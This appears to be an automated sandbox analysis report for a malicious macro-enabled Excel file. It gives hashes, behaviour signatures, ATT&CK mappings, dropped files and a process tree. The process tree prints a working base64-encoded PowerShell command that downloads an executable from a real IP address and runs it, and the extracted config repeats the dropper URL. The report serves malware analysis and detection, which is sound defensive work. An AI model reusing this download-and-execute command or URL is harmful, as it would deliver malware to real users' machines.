Overview

overview

10

Static

static

8

CSOIYQRONAGPE1.xlsm

windows7_x64

10

CSOIYQRONAGPE1.xlsm

windows10_x64

10

Analysis

  • max time kernel
    130s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-en-20211104
  • submitted
    25-11-2021 16:54

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    CSOIYQRONAGPE1.xlsm

  • Size

    102KB

  • MD5

    cc1439b54aa4b3db324fb921b94870ef

  • SHA1

    33a4c8af524b8e37f290000c654d897b440fd86c

  • SHA256

    95b3882e2ba6d5f35be8c35aa3d047e41ec110eb7f8aa69af7652f1cc29a6fb7

  • SHA512

    a9fb3881f480ca8dd86bb707b8216b596f4a848e25c797c15fb6c57b517beafe1fb2ddeb2d56321faf17e049bae4147582fd4052e7e1153962c0f7a6085fd4dc

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://18.192.215.191/team/z/CSOIYQRONAGPE1.exe

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Program crash 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\CSOIYQRONAGPE1.xlsm
    1⤵
    • Deletes itself
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • NTFS ADS
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: RenamesItself
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1648
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c Vpxldboqapmd.bat
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:108
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBLAGgAbABtAGQAYwBjAHAAcABxAGsAcABkAHEAcgBmAGgAdwBkAGoAdwAuAGUAeABlACIAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIgBoAHQAdABwADoALwAvADEAOAAuADEAOQAyAC4AMgAxADUALgAxADkAMQAvAHQAZQBhAG0ALwB6AC8AQwBTAE8ASQBZAFEAUgBPAE4AQQBHAFAARQAxAC4AZQB4AGUAIgAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAKAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAJABQAHIAbwBjAE4AYQBtAGUAIgApAA==
        3⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1800
        • C:\Users\Admin\AppData\Roaming\Khlmdccppqkpdqrfhwdjw.exe
          "C:\Users\Admin\AppData\Roaming\Khlmdccppqkpdqrfhwdjw.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1516
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 656
            5⤵
            • Loads dropped DLL
            • Program crash
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of AdjustPrivilegeToken
            PID:1944

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Khlmdccppqkpdqrfhwdjw.exe
    MD5

    a28c434e703d9d0961f526f87a61109c

    SHA1

    c18ce22d993ee202d7c4e91aeda8f602a1ddb054

    SHA256

    1a58c708f0c8b203949c9f180813f7fd6665b2f7bbf6f474b39d94e3d6638a30

    SHA512

    a380bd060f69d0813fa1c1141fc960225fbeb1a13195ed7349a2d0f7d3ad72e9b37df4f2f8afe45ac8b6bf4997fdc5bac69d9ec93123a1ef5e8f0871dc29e72d

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Khlmdccppqkpdqrfhwdjw.exe
    MD5

    a28c434e703d9d0961f526f87a61109c

    SHA1

    c18ce22d993ee202d7c4e91aeda8f602a1ddb054

    SHA256

    1a58c708f0c8b203949c9f180813f7fd6665b2f7bbf6f474b39d94e3d6638a30

    SHA512

    a380bd060f69d0813fa1c1141fc960225fbeb1a13195ed7349a2d0f7d3ad72e9b37df4f2f8afe45ac8b6bf4997fdc5bac69d9ec93123a1ef5e8f0871dc29e72d

    Download Submit
  • C:\Users\Admin\Documents\Vpxldboqapmd.bat
    MD5

    eb57c3c8f7622d52e5ea78fcbcf2d9b2

    SHA1

    ec417981a3089cb8c72a78fbff71051fb8bd20d0

    SHA256

    ec93f90790e65f73486f769f4ae33aea3f099f06ae20febdffa2e91b5abb289d

    SHA512

    a6873254a3fc69cbd6234d3b6cdf780ece9ac498eecbcc9adef4c4274f5288dbc0bf5a89d016a8730569913b8c00edd93b390f0b46c3c1a6ba235c6f4200805f

    Download Submit
  • \Users\Admin\AppData\Roaming\Khlmdccppqkpdqrfhwdjw.exe
    MD5

    a28c434e703d9d0961f526f87a61109c

    SHA1

    c18ce22d993ee202d7c4e91aeda8f602a1ddb054

    SHA256

    1a58c708f0c8b203949c9f180813f7fd6665b2f7bbf6f474b39d94e3d6638a30

    SHA512

    a380bd060f69d0813fa1c1141fc960225fbeb1a13195ed7349a2d0f7d3ad72e9b37df4f2f8afe45ac8b6bf4997fdc5bac69d9ec93123a1ef5e8f0871dc29e72d

    Download Submit
  • \Users\Admin\AppData\Roaming\Khlmdccppqkpdqrfhwdjw.exe
    MD5

    a28c434e703d9d0961f526f87a61109c

    SHA1

    c18ce22d993ee202d7c4e91aeda8f602a1ddb054

    SHA256

    1a58c708f0c8b203949c9f180813f7fd6665b2f7bbf6f474b39d94e3d6638a30

    SHA512

    a380bd060f69d0813fa1c1141fc960225fbeb1a13195ed7349a2d0f7d3ad72e9b37df4f2f8afe45ac8b6bf4997fdc5bac69d9ec93123a1ef5e8f0871dc29e72d

    Download Submit
  • \Users\Admin\AppData\Roaming\Khlmdccppqkpdqrfhwdjw.exe
    MD5

    a28c434e703d9d0961f526f87a61109c

    SHA1

    c18ce22d993ee202d7c4e91aeda8f602a1ddb054

    SHA256

    1a58c708f0c8b203949c9f180813f7fd6665b2f7bbf6f474b39d94e3d6638a30

    SHA512

    a380bd060f69d0813fa1c1141fc960225fbeb1a13195ed7349a2d0f7d3ad72e9b37df4f2f8afe45ac8b6bf4997fdc5bac69d9ec93123a1ef5e8f0871dc29e72d

    Download Submit
  • \Users\Admin\AppData\Roaming\Khlmdccppqkpdqrfhwdjw.exe
    MD5

    a28c434e703d9d0961f526f87a61109c

    SHA1

    c18ce22d993ee202d7c4e91aeda8f602a1ddb054

    SHA256

    1a58c708f0c8b203949c9f180813f7fd6665b2f7bbf6f474b39d94e3d6638a30

    SHA512

    a380bd060f69d0813fa1c1141fc960225fbeb1a13195ed7349a2d0f7d3ad72e9b37df4f2f8afe45ac8b6bf4997fdc5bac69d9ec93123a1ef5e8f0871dc29e72d

    Download Submit
  • \Users\Admin\AppData\Roaming\Khlmdccppqkpdqrfhwdjw.exe
    MD5

    a28c434e703d9d0961f526f87a61109c

    SHA1

    c18ce22d993ee202d7c4e91aeda8f602a1ddb054

    SHA256

    1a58c708f0c8b203949c9f180813f7fd6665b2f7bbf6f474b39d94e3d6638a30

    SHA512

    a380bd060f69d0813fa1c1141fc960225fbeb1a13195ed7349a2d0f7d3ad72e9b37df4f2f8afe45ac8b6bf4997fdc5bac69d9ec93123a1ef5e8f0871dc29e72d

    Download Submit
  • \Users\Admin\AppData\Roaming\Khlmdccppqkpdqrfhwdjw.exe
    MD5

    a28c434e703d9d0961f526f87a61109c

    SHA1

    c18ce22d993ee202d7c4e91aeda8f602a1ddb054

    SHA256

    1a58c708f0c8b203949c9f180813f7fd6665b2f7bbf6f474b39d94e3d6638a30

    SHA512

    a380bd060f69d0813fa1c1141fc960225fbeb1a13195ed7349a2d0f7d3ad72e9b37df4f2f8afe45ac8b6bf4997fdc5bac69d9ec93123a1ef5e8f0871dc29e72d

    Download Submit
  • memory/108-58-0x0000000000000000-mapping.dmp
    Download
  • memory/1516-74-0x00000000007F0000-0x00000000007F1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1516-72-0x0000000000A00000-0x0000000000A27000-memory.dmp
    Filesize

    156KB

    Download
  • memory/1516-66-0x0000000000000000-mapping.dmp
    Download
  • memory/1516-73-0x00000000009A0000-0x00000000009BB000-memory.dmp
    Filesize

    108KB

    Download
  • memory/1516-69-0x0000000000880000-0x0000000000881000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1516-71-0x0000000002190000-0x000000000220B000-memory.dmp
    Filesize

    492KB

    Download
  • memory/1648-57-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1648-55-0x000000002F3C1000-0x000000002F3C4000-memory.dmp
    Filesize

    12KB

    Download
  • memory/1648-56-0x0000000070FB1000-0x0000000070FB3000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1648-82-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1800-62-0x00000000022C0000-0x00000000022C1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1800-63-0x00000000022C1000-0x00000000022C2000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1800-61-0x0000000075491000-0x0000000075493000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1800-60-0x0000000000000000-mapping.dmp
    Download
  • memory/1800-64-0x00000000022C2000-0x00000000022C4000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1944-75-0x0000000000000000-mapping.dmp
    Download
  • memory/1944-81-0x0000000000340000-0x0000000000341000-memory.dmp
    Filesize

    4KB

    Download